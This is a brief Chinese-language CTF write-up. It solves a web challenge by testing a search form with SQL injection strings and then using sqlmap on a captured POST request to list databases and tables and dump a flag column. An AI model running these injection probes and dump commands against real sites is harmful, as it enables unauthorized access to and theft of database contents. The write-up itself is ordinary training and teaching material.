- 为什么要写已经结束很久的题的 writeup:因为在做某 CTF 训练平台的题
首先打开网站,是一个搜索界面,随便搜索下,好像没什么反应:
试试有没有注入:
- a':空白界面
- a and 1=1:没返回内容
- a and 1=1 and '%'='%:没返回内容
好像没啥可注入的,那看下包吧,上 burp,发现是 post 发包:
那么存为 1.txt,用 sqlmap 跑:
python sqlmap.py -r 1.txt -p search --dbs
python sqlmap.py -r 1.txt -p search -D news --tables
python sqlmap.py -r 1.txt -p search -D news -T secret_table --columns
python sqlmap.py -r 1.txt -p search -D news -T secret_table -C "fl4g,id" --dump
得到 flag:QCTF{sq1_inJec7ion_ezzz}